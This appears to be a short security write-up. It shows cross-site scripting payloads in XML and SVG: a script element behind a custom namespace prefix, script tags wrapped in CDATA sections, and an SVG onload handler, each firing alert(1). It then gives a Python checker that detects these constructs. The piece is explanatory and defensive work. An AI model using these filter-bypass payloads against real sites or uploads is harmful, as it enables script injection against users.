Thanks to: @pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc
Follow me on https://twitter.com/si9int to stay updated!
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
xmlns declares the XML namespace, and "something" is the prefix bound to that namespace (to avoid name conflicts with other XML fragments).
<name> <value><![CDATA[<script>alert(1)</script>]]></value> </name>
CDATA stands for "Character Data" and marks the enclosed data (inside the tag) as content that could be, but must not be, interpreted as XML markup.
The content of a CDATA section is part of the XML document, while a comment is not.
<polygon> creates a closed shape with at least three sides, given as points (0,0; 0,50; 50,0).
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
Again we can use CDATA to embed the payload "silently":
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></script>
<desc> is not a rendered part of the graphic; it provides a description of any SVG element.
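The three constructs above (a script element hidden behind an arbitrary namespace prefix, markup inside a CDATA section, and an event-handler attribute on an SVG root) are exactly what an upload or sanitiser check for XML/SVG should look for. The following is an added example, not code from the original post: it uses Python's namespace-aware expat parser so that the chosen prefix is irrelevant, flags markup inside CDATA, and rejects documents that are not well-formed rather than trying to repair them. The findings strings and the SCRIPT_NAMESPACES set are my own constructions.

```python
import re
import xml.parsers.expat

# Namespaces whose <script> element a browser executes (constructed list).
SCRIPT_NAMESPACES = {"http://www.w3.org/1999/xhtml", "http://www.w3.org/2000/svg"}


def audit_markup(doc: str) -> list:
    # Returns a list of findings for the constructs discussed above; [] means none.
    findings = []
    cdata_buf = None  # collects text while inside a <![CDATA[ ... ]]> section
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def start_element(name, attrs):
        # With a separator set, expat reports names as "namespace-uri local-name",
        # so <something:script xmlns:something="...xhtml"> resolves to XHTML 'script'.
        ns, _, local = name.rpartition(" ")
        if local.lower() == "script" and (ns in SCRIPT_NAMESPACES or ns == ""):
            findings.append(f"script element in namespace {ns or '(none)'}")
        for attr in attrs:
            if attr.rpartition(" ")[2].lower().startswith("on"):
                findings.append(f"event handler attribute {attr} on <{local}>")

    def start_cdata():
        nonlocal cdata_buf
        cdata_buf = []

    def end_cdata():
        nonlocal cdata_buf
        text = "".join(cdata_buf)
        # Inert to the XML parser, but live markup once a sanitiser unwraps the section.
        if re.search(r"</?\w", text):
            findings.append(f"markup inside CDATA: {text.strip()[:40]!r}")
        cdata_buf = None

    def char_data(text):
        if cdata_buf is not None:
            cdata_buf.append(text)

    parser.StartElementHandler = start_element
    parser.StartCdataSectionHandler = start_cdata
    parser.EndCdataSectionHandler = end_cdata
    parser.CharacterDataHandler = char_data
    try:
        parser.Parse(doc, True)
    except xml.parsers.expat.ExpatError as err:
        # A document that is not well-formed should be rejected, not repaired.
        findings.append(f"not well-formed XML, reject rather than repair: {err}")
    return findings
```

An empty list means none of the discussed constructs were seen; any finding should cause the document to be rejected before it reaches a browser.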